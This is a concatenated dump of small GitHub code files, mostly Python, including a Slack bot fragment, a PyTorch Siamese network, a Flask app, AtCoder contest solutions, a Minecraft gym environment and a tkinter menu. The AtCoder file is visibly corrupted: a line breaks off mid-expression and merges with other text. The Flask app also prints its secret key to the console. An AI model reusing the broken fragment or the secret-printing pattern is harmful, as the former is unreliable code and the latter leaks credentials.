it?* <{url}|Google>\",\n ]\n )\n\n slack.append_to_thread(\n text=config.thread_post_preview, blocks=[slack_markdown_block(details_post)]\n )\n except Exception as e:\n slack.delete()\n logger.exception(e)\n\n\ndef fetch_quote_and_motive():\n motive, quote = None, None\n for _ in range(config.gpt3_retries):\n result = query_gpt3(config.gpt3_prompt)\n if config.gpt3_delimiter not in result:\n logger.info(f\"Skipping: {result}\")\n continue\n parts = result.split(config.gpt3_delimiter)\n if len(parts) == 2 and len(parts[0]) > 15 and len(parts[1]) > 5:\n quote, motive = parts\n break\n else:\n logger.info(f\"Skipping: {result}\")\n return motive, quote\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n if len(sys.argv) == 3:\n quote = sys.argv[1]\n motive = sys.argv[2]\n print(f\"received: {quote}\")\n print(f\" {motive}\")\n run(quote=quote, motive=motive)\n else:\n run()\n","repo_name":"sg10/quotes-slackbot","sub_path":"src/quotes_slackbot/quote_generator.py","file_name":"quote_generator.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} 
+{"seq_id":"9164137243","text":"import yaml\nimport os\nfrom database import *\n\nlocales = {}\n\nclass locale():\n dictionary = []\n def __init__(self, locale = 'en_US', branch = None):\n query = locales.get(locale)\n if branch is not None:\n self.dictionary = branch \n elif query is None:\n self.load(locale) \n else:\n self.dictionary = query\n\n def load(self, locale = 'en_US'):\n with open(f'localisation/{locale}.yml', 'r') as stream:\n locales[locale] = yaml.safe_load(stream)\n self.dictionary = locales[locale]\n\n def get(self, key='lorem_ipsum'):\n branch = self.dictionary.get(key, key)\n if type(branch) is dict: new = locale(branch = branch)\n else: new = branch\n return new\n","repo_name":"RUMBlk/VibinBot","sub_path":"localisation.py","file_name":"localisation.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3218723481","text":"\"\"\"\nBuild the Siamese neural network\n\"\"\"\n# 1.embedding\n# 2.GRU\n# 3.attention\n# 4.attention concate GRU output\n# 5.GRU\n# 6.pooling\n# 7.DNN\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nimport config\n\n\nclass Siamese(nn.Module):\n def __init__(self):\n super().__init__()\n self.embedding = nn.Embedding(num_embeddings=len(config.sort_ws),\n embedding_dim=config.sort_embedding_dim,\n padding_idx=config.sort_ws_padding_index)\n self.gru1 = nn.GRU(input_size=config.sort_embedding_dim, hidden_size=config.sort_hidden_size,\n num_layers=config.sort_num_layers, batch_first=config.sort_batch_first,\n bidirectional=config.sort_bidirectional, dropout=config.sort_dropout)\n self.gru2 = nn.GRU(input_size=config.sort_hidden_size * config.sort_num_directions * 2,\n hidden_size=config.sort_hidden_size,\n num_layers=1,\n batch_first=config.sort_batch_first,\n bidirectional=False)\n self.dnn = nn.Sequential(\n nn.Linear(config.sort_num_directions * config.sort_hidden_size * 4, config.sort_linear_size),\n nn.ELU(inplace=True),\n nn.BatchNorm1d(config.sort_linear_size),\n nn.Dropout(config.sort_dropout),\n\n nn.Linear(config.sort_linear_size, config.sort_linear_size),\n nn.ELU(inplace=True),\n nn.BatchNorm1d(config.sort_linear_size),\n nn.Dropout(config.sort_dropout),\n\n nn.Linear(config.sort_linear_size, 2),\n )\n\n def forward(self, input1, input2):\n \"\"\"\n :param input1: [batch_size, seq_len]\n :param input2: [batch_size, seq_len]\n :return:\n \"\"\"\n # Build two mask matrices: pad positions get value 1, non-pad positions get value 0\n mask1, mask2 = input1.eq(config.sort_ws_padding_index), input2.eq(config.sort_ws_padding_index)\n input1 = self.embedding(input1) # [batch_size, seq_len1, embedding_dim]\n input2 = self.embedding(input2) # [batch_size, seq_len2, embedding_dim]\n # First GRU\n # batch_first = True is set here\n # output1 [batch_size, seq_len1, num_directions*hidden_size]\n # hidden_state [num_layers*num_directions,batch_size, hidden_size]\n output1, hidden_state1 = self.gru1(input1)\n output2, hidden_state2 = self.gru1(input2)\n # Attention\n output1_align, output2_align = self.soft_attention_align(output1, output2, mask1, mask2)\n # Concatenate\n output1 = torch.cat([output1, output1_align], dim=-1) # [batch_size, seq_len, num_directions*hidden_size*2]\n output2 = torch.cat([output2, output2_align], dim=-1) # [batch_size, seq_len, num_directions*hidden_size*2]\n # Second GRU\n # batch_first = True is set here as well\n # output1 [batch_size, seq_len1, num_directions*hidden_size]\n # hidden_state [num_layers*num_directions,batch_size, hidden_size]\n gru2_output1, gru2_hidden_state1 = self.gru2(output1)\n gru2_output2, 
gru2_hidden_state2 = self.gru2(output2)\n # Pooling\n # [batch_size, 2*num_directions*hidden_size]\n output1_pooled = self.apply_pooling(gru2_output1)\n output2_pooled = self.apply_pooling(gru2_output2)\n # [batch_size, 4*num_directions*hidden_size]\n out = torch.cat([output1_pooled, output2_pooled], dim=-1)\n out = self.dnn(out) # [batch_size, 2]\n return F.softmax(out, dim=-1)\n\n @staticmethod\n def apply_pooling(output):\n # Set the window size to the sentence length, i.e. take the mean or max over the whole sentence (an n-gram-like effect); the seq_len dimension becomes 1\n # [batch_size, num_directions*hidden_size]\n avg_pooled = F.avg_pool1d(output.transpose(1, 2), kernel_size=output.size(1)).squeeze()\n max_pooled = F.max_pool1d(output.transpose(1, 2), kernel_size=output.size(1)).squeeze()\n\n # [batch_size, 2*num_directions*hidden_size]\n return torch.cat([avg_pooled, max_pooled], dim=1)\n\n @staticmethod\n def soft_attention_align(x1, x2, mask1, mask2):\n \"\"\"\n Implements attention\n :param x1 [batch_size, seq_len_1, num_directions*hidden_size]\n :param x2 [batch_size, seq_len_2, num_directions*hidden_size]\n :param mask1 [batch_size, seq_len_1]\n :param mask2 [batch_size, seq_len_2]\n :return output1_align [batch_size, seq_len_2, num_directions*hidden_size]\n :return output2_align [batch_size, seq_len_1, num_directions*hidden_size]\n \"\"\"\n # Turn mask positions with value 1 (i.e. all pads) into -inf, so the pads contribute nothing to the computation\n mask1 = mask1.float().masked_fill_(mask1, float(\"-inf\"))\n mask2 = mask2.float().masked_fill_(mask2, float(\"-inf\"))\n # 1.attention weight\n # 2.attention_weight * output\n # x2.permute(2,1) [batch_size, num_directions*hidden_size, seq_len_2]\n # mask2.unsqueeze(1) [batch_size, 1, seq_len_2]\n # Here x2 is treated as the encoder and x1 as the decoder\n # Multiply decoder and encoder outputs, then softmax to get the attention weight\n # Multiply the attention weight with the encoder to get the context vector\n x1_attention_energy = x1.bmm(x2.permute(0, 2, 1)) # [batch_size, seq_len_1, seq_len_2]\n x1_attention_weight = F.softmax(x1_attention_energy + mask2.unsqueeze(1), dim=-1)\n output2_align = x1_attention_weight.bmm(x2) # [batch_size, seq_len_1, num_directions*hidden_size]\n\n # Treat x1 as the encoder; same principle as above\n x2_attention_energy = x1_attention_energy.permute(0, 2, 1) # [batch_size, seq_len_2, seq_len_1]\n x2_attention_weight = F.softmax(x2_attention_energy + mask1.unsqueeze(1), dim=-1)\n output1_align = x2_attention_weight.bmm(x1) # [batch_size, seq_len_2, num_directions*hidden_size]\n return output1_align, output2_align\n","repo_name":"kenzzuli/chat_service","sub_path":"dnn/sort/siamese.py","file_name":"siamese.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70830294566","text":"import os\nfrom flask import Flask\nfrom dotenv import load_dotenv\nload_dotenv()\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\n\nsecret = os.getenv('SECRET_KEY')\nprint(secret)\n\n@app.route('/')\ndef index():\n return \"Hello world\"\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Tukkis/TreeniApp","sub_path":"treeni-app-back/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35717512024","text":"from db.db import singleton_ScrubDB\r\nfrom db.db import singleton_ResultsDB\r\n\r\ndef getResultsTableRows(tableName):\r\n if singleton_ResultsDB.table_exists(tableName):\r\n singleton_ResultsDB.cursor.execute('select * from {}'.format(tableName))\r\n rows = singleton_ResultsDB.cursor.fetchall()\r\n singleton_ResultsDB.connect.commit()\r\n return rows\r\n return 
[]\r\n\r\n\r\ndef getScrubTableRows(tableName):\r\n if singleton_ScrubDB.table_exists(tableName):\r\n singleton_ScrubDB.cursor.execute('select * from {}'.format(tableName))\r\n rows = singleton_ScrubDB.cursor.fetchall()\r\n singleton_ScrubDB.connect.commit()\r\n return rows\r\n print('table[', tableName, '] not exist in scrub')\r\n return []\r\n\r\n\r\ndef compareTwoTable(table1, table2):\r\n rows_table1 = getResultsTableRows(table1)\r\n rows_table2 = getResultsTableRows(table2)\r\n exKeys = ['id', 'updateTime']\r\n # print(rows_table1[0].keys())\r\n diffrent_dict = {} # key & [{raceInfo}]\r\n for row_2 in rows_table2:\r\n if row_2['horse_no'] >= 1000:\r\n continue\r\n race_date = row_2['race_date']\r\n race_no = row_2['race_no']\r\n horse_no = row_2['horse_no']\r\n # print('\\n', race_date, race_no, horse_no)\r\n find = False\r\n for row_1 in rows_table1:\r\n if (row_1['race_date'] == race_date) and (row_1['race_no'] == race_no) and (row_1['horse_no'] == horse_no):\r\n find = True\r\n keys = row_1.keys()\r\n for key in keys:\r\n if key in exKeys:\r\n continue\r\n elif row_1[key] != row_2[key]:\r\n if key not in diffrent_dict.keys():\r\n diffrent_dict[key] = []\r\n info_dict = {}\r\n info_dict['race_date'] = race_date\r\n info_dict['race_no'] = race_no\r\n info_dict['horse_no'] = horse_no\r\n info_dict['table1'] = row_1[key]\r\n info_dict['table2'] = row_2[key]\r\n diffrent_dict[key].append(info_dict)\r\n # print('\\n', race_date, race_no, horse_no)\r\n # print('not same:', race_date, race_no, horse_no, ' key:', key, ' table1:', row_1[key], ' table2:', row_2[key])\r\n break\r\n if not find:\r\n # if 20190224 == row_2['race_date']:\r\n # pass\r\n # else:\r\n print(\"data can't find in[\", table1, ']:', race_date, race_no, horse_no)\r\n print('keys:', diffrent_dict.keys())\r\n for key, array in diffrent_dict.items():\r\n for dif in array:\r\n print(key, dif)\r\n\r\n\r\ncompareTwoTable('table_dragon_history_model5', 'table_dragon_history_model5_7_14')\r\n\r\n","repo_name":"JudyPhy/spider","sub_path":"20190413/CheckData/compare_two_tables.py","file_name":"compare_two_tables.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32438243317","text":"# n = int(input())\r\n# a, b, c = map(int, input().split())\r\n# A = list(map(int, input().split()))\r\n\r\n#A\r\nn = input()\r\nprint(n.zfill(4))\r\n\r\n#B\r\np= int(input().split()[-1])\r\nprint(sum([int(a)
    j:\r\n pass\r\n elif j <= k_max:\r\n now[j] = prev[j]\r\n else:\r\n now[j] = prev[k_max]\r\n\r\n prev = defaultdict(int)\r\n num = 0\r\n for k, v in now.items():\r\n num = (num + v) % large\r\n prev[k] = num\r\n\r\nans = 0\r\nfor cnt in now.values():\r\n ans = (ans + cnt) % large\r\nprint(ans)\r\n\r\n#E\r\n\r\nlarge = 998244353","repo_name":"KazuhideMimura/AtCoder","sub_path":"ABC/ABC222.py","file_name":"ABC222.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22640157725","text":"from django.urls import path\nfrom restrito import views\n\napp_name = 'restrito'\n\nurlpatterns = [\n path('lista-atividades', views.listar_atividades, name='lista-atividades'),\n path('cadastrar-atividade', views.cadastrar_atividade, name='cadastrar-atividade'),\n path('alterar-atividade/', views.alterar_atividade, name='alterar-atividade'),\n path('excluir-atividade/', views.excluir_atividade, name='excluir-atividade')\n]","repo_name":"nicolasrezende/lms-identidade-visual","sub_path":"lms/restrito/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71390036325","text":"import os\nimport sys\nimport shutil\nimport string\nimport re\n\npy = '.py'\ngo = '.go'\ndef file_name(file_dir):\n\n for root, dirs, files in os.walk(file_dir):\n if (os.path.dirname(root)== file_dir or os.path.dirname(os.path.dirname(root))== file_dir) and not root.isdigit():\n for i in files:\n if i =='process.py' or i in dirs:\n continue\n if i.endswith(py) :\n str = i.strip(py)\n if str not in dirs:\n filedir = root + \"\\\\\" + str\n os.makedirs(filedir)\n oldpath = root + \"\\\\\" + i\n newpath = root+\"\\\\\"+str+\"\\\\\"+i\n print(oldpath,newpath)\n shutil.move(oldpath,newpath)\n if i.endswith(go) :\n str = i.strip(go)\n if str not in dirs:\n filedir = root + \"\\\\\" + str\n os.makedirs(filedir)\n oldpath = root + \"\\\\\" + i\n newpath = root + \"\\\\\" + str + \"\\\\\" + i\n print(oldpath, newpath)\n shutil.move(oldpath,newpath)\n\n\n\n\npath = sys.path[0]\nprint(path)\nfile_name(path)\ngopath = sys.path[0]+\"\\\\Golang\"\npypath = sys.path[0]+\"\\\\Python\"","repo_name":"AllanZheng/Leetcode","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73624232484","text":"#no folders\nimport os\nimport shutil\ndef rename(Path):\n\tpath=Path\n\tfilelist=os.listdir(path)#all files under this folder (including folders)\n\tfilelist=sorted(filelist)\n\tprint (filelist)\n\tprint('-'*80)\n\n\tloadnum = 1\n\tfor files in filelist[::-1]:#iterate over all files\n\t\tOlddir=os.path.join(path,files)#original file path\n\t\tif os.path.isdir(Olddir):#skip if it is a folder\n\t\t\tcontinue\n\t\tfilename=os.path.splitext(files)[0]#file name\n\t\tfiletype=os.path.splitext(files)[1]#file extension\n\t\tchange=str(int(filename[-4:])+250)\n\t\tnewfilename=filename.replace(filename[-4:],change)\n\t\tNewdir=os.path.join(path,newfilename+filetype)#new file path\n\t\tos.rename(Olddir,Newdir)#rename\n\t\tprint ('[' + str(loadnum) + ' / 59]')\n\t\tloadnum += 1\n\tprint('rename success !!')\nif __name__ == 
'__main__':\n\tpath=\"\\\\\\\\192.168.2.230\\\\Main\\\\Project2016\\\\TMZ\\\\Shots\\\\TMZ_001_004\\\\TMZ_001_004_0010\\\\Minicomp\\\\TMZ_001_004_0010_Minicomp_v280\\\\footage\\\\TMZ_001_004_0010_LAYER0\"\n\trename(path)\n","repo_name":"CedricMx/Tools","sub_path":"file_changename/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"626644859","text":"#Uses python3\n\n\ndef getMax(myList):\n max = None\n for i in range(len(myList)):\n if max is None or myList[i] > max:\n max = myList[i]\n\n return max\n\n\ndef max_dot_product(a, b):\n res = 0\n for i in range(len(a)):\n # For each list find the maximums and iterate for all elements\n maxValueA = getMax(a)\n a.remove(maxValueA)\n maxValueB = getMax(b)\n b.remove(maxValueB)\n res += maxValueA * maxValueB # Add maximum product to the result\n return res\n\n\nif __name__ == '__main__':\n numbers = input()\n firstSeq = [int(x) for x in input().split()]\n secondSeq = [int(x) for x in input().split()]\n print(max_dot_product(firstSeq, secondSeq))","repo_name":"OnerInce/coursera-projects","sub_path":"greedy-solutions/python-max_revenue/max_revenue.py","file_name":"max_revenue.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"44218129830","text":"def sentidoPercurso(p1,p2,p3):\n a = p2[0] - p1[0]\n b = p3[1] - p1[1]\n c = p3[0] - p1[0]\n d = p2[1] - p1[1]\n a = (a*b)-(c*d)\n if (a > 0):\n return 1\n elif (a < 0):\n return -1\n else:\n return 0\n\ndef intercepta(s1,s2):\n x1, y1 = s1[0]\n x2, y2 = s1[1]\n x3, y3 = s2[0]\n x4, y4 = s2[1]\n if (max(x1, x2) >= min(x3, x4) and\n max(x3, x4) >= min(x1, x2) and\n max(y1, y2) >= min(y3, y4) and\n max(y3, y4) >= min(y1, y2) and\n sentidoPercurso(s1[0], s1[1], s2[0]) * sentidoPercurso(s1[0], s1[1], s2[1]) <= 0 and\n sentidoPercurso(s2[0], s2[1], s1[0]) * sentidoPercurso(s2[0], s2[1], s1[1]) <= 0):\n return 1\n else:\n return 0\n\ndef pontoNoSegmento(p1,p2,p3):\n resultado = (sentidoPercurso(p1,p2,p3) == 0) and (p1[0] >= min(p2[0], p3[0])) and (p1[0] <= max(p2[0], p3[0])) and (p1[1] >= min(p2[1], p3[1])) and (p1[1] <= max(p2[1], p3[1]))\n return resultado\n\ndef pontoInterior(poligono,n,q):\n maxx = poligono[0][0]\n s1 = [[0,0],[0,0]]\n s2 = [[0,0],[0,0]]\n poligono[n] = poligono[0]\n\n for i in range(1,n+1):\n if(pontoNoSegmento(q,poligono[i-1],poligono[i])):\n return 5\n if(poligono[i][0] > maxx):\n maxx = poligono[i][0]\n\n s2[0] = q\n s2[1][0] = maxx+1\n s2[1][1] = q[1]\n cont = 0\n \n for i in range(1,n+1):\n s1[0] = poligono[i-1]\n s1[1] = poligono[i]\n if ((((poligono[i][1] > q[1]) and (poligono[i-1][1] <= q[1])) or ((poligono[i-1][1] > q[1]) and (poligono[i][1] <= q[1]))) and (intercepta(s1,s2))):\n cont += 1 \n return cont%2\n\ndef saida(interior):\n if(interior == 5):\n return '/'\n elif(interior == 1):\n return '!'\n else:\n return '-'\n\ndef interfaceGrafica():\n nCasos = int(input())\n while(nCasos > 0):\n n = int(input())\n pontosPoligono = input().split(\" \")\n c = int(input())\n pontosClique = input().split(\" \")\n poligono = [0]*((2*n)+1)\n cliques = [0]*((2*c)+1)\n\n for i in range(2*n):\n poligono[i] = int(pontosPoligono[i])\n \n for i in range(2*c):\n cliques[i] = int(pontosClique[i])\n \n for i in range(n):\n poligono[i:i+2] = [poligono[i:i+2]]\n\n for i in range(c):\n cliques[i:i+2] = [cliques[i:i+2]]\n\n output = ''\n for i in range(c):\n interior = 
pontoInterior(poligono,n,cliques[i])\n output += saida(interior)\n\n print(output)\n nCasos -= 1\n\ninterfaceGrafica()","repo_name":"mercietc/Algorithms-Development-and-Implementation---Beecrowd-Challenges","sub_path":"Semana14-Geometria-Discreta-I/interfaceGrafica.py","file_name":"interfaceGrafica.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17261580562","text":"import sys\nsys.stdin = open(\"input.txt\")\n\nT = int(input())\n\n\nfor tc in range(1, T+1):\n n, m = map(int, input().split())\n li = list(map(int, input().split()))\n # pair each index number with its amount of cheese in a list\n pizza = [[i+1, v] for i, v in enumerate(li)]\n # only n pizzas fit in the oven\n oven = pizza[:n]\n # pizzas that did not fit in the oven\n pizza = pizza[n:]\n # until only one pizza is left in the oven\n while len(oven) != 1:\n # the pizza being taken out\n check_pizza = oven.pop(0)\n # the amount of cheese is less than before.\n check_pizza[1] //= 2\n # what if the cheese has melted completely?\n if check_pizza[1]==0:\n # and there is a pizza that did not fit in the oven?\n if pizza:\n # then put it in the oven.\n oven.append(pizza.pop(0))\n # cheese not melted yet?\n else:\n # put it back in the oven\n oven.append(check_pizza)\n\n print(\"#{} {}\".format(tc, oven[0][0]))\n\n","repo_name":"Gwanghun-Im/algorithm_study","sub_path":"5099_피자굽기/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28552834130","text":"import math\n\ndef ejercico01():\n print(\"hola\")\n\n num=[None]*12 #define vector\n\n #Assigning values\n num[0]=39\n num[1]=-2\n num[4]=0\n num[6]=14\n num[8]=5\n num[9]=120\n numx=[39,-2,None,None, 0,None,14,None,5,120,None,None]\n #Print vector\n print(num)\n print(numx)\n\ndef ejercio02():\n num1=int(input(\"Ingrese el Primer numero:\"))\n num2=int(input(\"Ingrese el Segundo numero:\"))\n c=num1/num2\n print(\"Cociente:\", c)\n r=num1%num2\n print(\"Resto:\", r)\n\ndef ejercicio31():\n #define variables\n nota:float()\n categoria:str()\n #Read data\n nota=float(input(\"Ingrese Nota Promedio:\"))\n #process\n if nota>=0 and nota<=5:\n categoria=\"Pesimo\"\n elif nota>=6 and nota<=10:\n categoria=\"Malo\"\n elif nota>=11 and nota<=14:\n categoria=\"Regular\"\n elif nota>=15 and nota<=16:\n categoria=\"Bueno\"\n elif nota>=17 and nota<=20:\n categoria=\"Excelente\"\n else:\n categoria=\"Nota no valida\"\n #Output data\n print(categoria)\n\ndef ejercicio08():\n #Define variables\n capital:float()\n ti:float()\n ic:float()\n tiempo:int()\n #Input data\n capital=float(input(\"Ingrese el Capital:\"))\n ti=float(input(\"Ingrese tasa de interes:\"))\n tiempo=int(input(\"Tiempo de inversion:\"))\n #Process\n ic=((math.pow((1+ti),tiempo))*capital) - capital\n #Output data\n print(\"Intere Compuesto:\", ic)\n#ejercio02()\n#ejercicio31()\n\ndef propuesto50():\n #define variables\n numFin:int() \n #Input data\n numFin=int(input(\"Ingrese el rango Final:\"))\n #process\n if(numFin>=10):\n for i in range(numFin): \n valorI=str(i)[::-1]; \n if i>=10 and i==int(valorI):\n print(i)\n\n \n #output data\ndef propuesto43():\n numA=int(input(\"Ingrese el num A:\"))\n numB=int(input(\"Ingrese el num B:\"))\n numPar, numImpar, numMult3=0,0,0 \n sumPar, sumImpar, sumMult3=0,0,0\n for i in range(numA,numB+1):\n if i%2==0:\n numPar=numPar+1\n sumPar=sumPar+i\n else:\n numImpar=numImpar+1\n sumImpar=sumImpar+i\n if(i%3==0):\n numMult3=numMult3+1\n sumMult3=sumMult3+i\n print(\"Cant num Par:\", numPar)\n print(\"Cant num Impar:\", numImpar)\n print(\"Cant num Multiplo 
3:\", numMult3)\n print(\"Suma num Par:\", sumPar)\n print(\"Suma num Impar:\", sumImpar)\n print(\"Suma num Multiplo 3:\", sumMult3) \n\n#ejercicio08()\n#propuesto50()\npropuesto43()\n\n\n\n\n","repo_name":"davidmp/ReforzamientoFP2022","sub_path":"ReforzamientoPython/Ejercicios.py","file_name":"Ejercicios.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13436403249","text":"class Solution:\n def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n # Monotonic stack problem\n stack = []\n days = [0] * len(temperatures)\n \n for i, temp in enumerate(temperatures):\n while len(stack) > 0 and temp > stack[-1][0]:\n _, p_i = stack.pop()\n days[p_i] = i - p_i\n stack.append((temp, i))\n \n return days\n","repo_name":"wpine215/dsa-practice","sub_path":"stack/daily_temperatures.py","file_name":"daily_temperatures.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8509789385","text":"'''\nmethod to read stored credentials from a file to connect to the mongo database.\n'''\n\n\ndef read_credential(file_name=None):\n\n\twith open(file_name, \"r\") as _file:\n\t\t_lines = _file.readlines()\n\t\t_file.close()\n\t\tuser_name = _lines[0].strip().split()[1]\n\t\tpwd = _lines[1].strip().split()[1]\n\t\turl = _lines[2].strip().split()[1]\n\t\treturn user_name, pwd, url\n\n","repo_name":"SiddharthaAnand/dblp-spider","sub_path":"coauthornetwork/read_credential.py","file_name":"read_credential.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"29975736527","text":"import gym\nimport math\nimport os, time\nfrom gym import error, spaces, utils, logger\nfrom gym.utils import seeding\nimport numpy as np\nfrom PIL import Image\n\nclass MinecraftLiveEnv(gym.Env):\n \"\"\"\n Description:\n Vanilla Minecraft Java Edition - This gym was designed to work tightly with Minecraft as players would play it, unlike tools such as project Malmo \n that rely on plugins to interact with the environment. With MinecraftLive, the agent is exposed to the Minecraft environment by sending keyboard and \n mouse emulations to the environment and capturing/processing a screenshot as part of the observation process.\n\n Currently integrates with the MindcraftMind project, a tool designed to interact with the Minecraft client without the use of plugins. \n TODO: Adapt the environment to be configurable to be used with other agents, such as Malmo.\n Source:\n Project Malmo and others involving the applications of RL to Minecraft\n Observation: \n Type: Agent analyzes the image and captures health, food, brightness data. \n Actions:\n Type: Commands to send to the Minecraft client via the agent (currently MindcraftMind)\n \n Note: More than one command can be issued at a time - for example: Holding shift while moving to move with stealth. 
This action (moving stealthily) \n must be learned by the agent as opposed to being an option to select from.\n Reward:\n Reward is 1 for every step taken, including the termination step\n Starting State:\n All observations are assigned a uniform random value in [-0.05..0.05]\n Episode Termination:\n The agent dies and is presented with the death screen.\n\n Solved Requirements\n High score on hard mode\n \"\"\"\n\n metadata = {\n 'render.modes': ['human'],\n 'video.frames_per_second': 120\n }\n \n def __init__(self, agent, screenshot_path):\n self.agent = agent\n self.screenshot_path = screenshot_path \n self.action_space = spaces.MultiDiscrete(self.agent.action_spaces)\n self.observation_space = None\n self.seed()\n self.viewer = None\n self.state = None\n self.steps_beyond_done = None\n self.screenshot_history = None\n\n\n def set_agent(self, agent):\n self.agent = agent\n\n\n def get_agent(self):\n return self.agent\n\n\n def set_screenshot_history_path(self, history):\n self.screenshot_history = history\n\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n\n def step(self, action):\n assert self.screenshot_path != None, \"%r (%s) invalid. Be sure to set the location of where the Minecraft client stores screenshots by calling `set_screenshot_paths` when initializing.\"\n assert self.screenshot_history != None, \"%r (%s) invalid. Be sure to set the location of where the environment stores screenshot history by calling `set_screenshot_paths` when initializing.\"\n state = self.state\n \n threads = []\n for index, action_item in enumerate(action):\n action_thread = self.agent.perform_action(self.agent.actions[index][action_item])\n threads.append(action_thread)\n \n #for thread in threads:\n # thread.join()\n \n self.get_state()\n done = self.agent.is_dead(self.state)\n \n reward = 0\n if not done:\n reward = reward + 1\n elif self.steps_beyond_done is None:\n # Agent just died!\n self.steps_beyond_done = 0\n reward = 1\n else:\n if self.steps_beyond_done == 0:\n logger.warn(\"You are calling 'step()' even though this environment has already returned done = True. 
You should always call 'reset()' once you receive 'done = True' -- any further steps are undefined behavior.\")\n self.steps_beyond_done += 1\n reward = 0.0\n\n return self.state, reward, done, {}\n\n\n def render(self, mode='human'):\n if self.viewer is None:\n from gym.envs.classic_control import rendering\n self.viewer = rendering.SimpleImageViewer(maxwidth=self.agent.resolution[0])\n if self.state is None:\n state = np.array(Image.new('RGBA',(self.agent.resolution[0],self.agent.resolution[1]), (255, 255, 255, 255)))\n else:\n im = None\n wait_count = 0\n while im is None:\n try:\n im = Image.open(self.state)\n except:\n time.sleep(0.01)\n wait_count = wait_count + 1\n if(wait_count > 100):\n break\n state = np.array(im) \n return state\n \n\n def get_state(self):\n self.agent.look()\n files = os.listdir(self.screenshot_path) #images = self.poll_for_screenshot(self.screenshot_path)\n if(len(files) > 0):\n files.sort(reverse=True)\n self.state = os.path.join(self.screenshot_path, files[0])\n return self.state \n\n\n def reset(self):\n self.steps_beyond_done = None \n if(self.state is not None):\n self.agent.respawn()\n return self.get_state()\n\n","repo_name":"dfredriksen/gym_MinecraftLive","sub_path":"gym_MinecraftLive/envs/MinecraftLive_env.py","file_name":"MinecraftLive_env.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10362083127","text":"# coding=utf-8\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nfrom page import course, exercise\n\nclass MainPage():\n\n def __init__(self, goCoursePage, goExercisePage):\n self.goCoursePage = goCoursePage\n self.goExercisePage = goExercisePage\n\n self.root = tk.Tk()\n self.root.title(\"仓颉学习器\")\n self.root.geometry(\"600x600\")\n self.root.configure(background='white')\n self.root.resizable(False, False)\n\n self.pixel = tk.PhotoImage(width=1, height=1)\n\n self.frameLeft = tk.Frame(width=100, height=600, bg=\"white\")\n self.frameCenter1 = tk.Frame(width=400, height=100, bg=\"white\")\n self.frameCenter2 = tk.Frame(width=400, height=100, bg=\"white\")\n self.frameCenter3 = tk.Frame(width=400, height=100, bg=\"white\")\n self.frameCenter4 = tk.Frame(width=400, height=100, bg=\"white\")\n self.frameCenter5 = tk.Frame(width=400, height=200, bg=\"white\")\n self.frameRight = tk.Frame(width=100, height=600, bg=\"white\")\n\n tk.Button(self.frameCenter2, text=\"倉頡教學\", width=\"400\", height=\"100\", font=('microsoft yahei', '30', 'bold'), image=self.pixel,\n compound=\"center\", command=self.goCoursePage).grid(row=0)\n tk.Button(self.frameCenter4, text=\"倉頡拆碼練習\", width=\"400\", height=\"100\", font=('microsoft yahei', '30', 'bold'), image=self.pixel,\n compound=\"center\", command=self.goExercisePage).grid(row=0)\n\n self.frameLeft.grid(row=0, column=0, rowspan=5)\n self.frameCenter1.grid(row=0, column=1, sticky=\"n\")\n self.frameCenter2.grid(row=1, column=1, sticky=\"n\")\n self.frameCenter3.grid(row=2, column=1, sticky=\"n\")\n self.frameCenter4.grid(row=3, column=1, sticky=\"n\")\n self.frameCenter5.grid(row=4, column=1, sticky=\"n\")\n self.frameRight.grid(row=0, column=2, rowspan=5)\n\n self.frameLeft.grid_propagate(0)\n self.frameCenter1.grid_propagate(0)\n self.frameCenter2.grid_propagate(0)\n self.frameCenter3.grid_propagate(0)\n self.frameCenter4.grid_propagate(0)\n self.frameCenter5.grid_propagate(0)\n self.frameRight.grid_propagate(0)\n\n 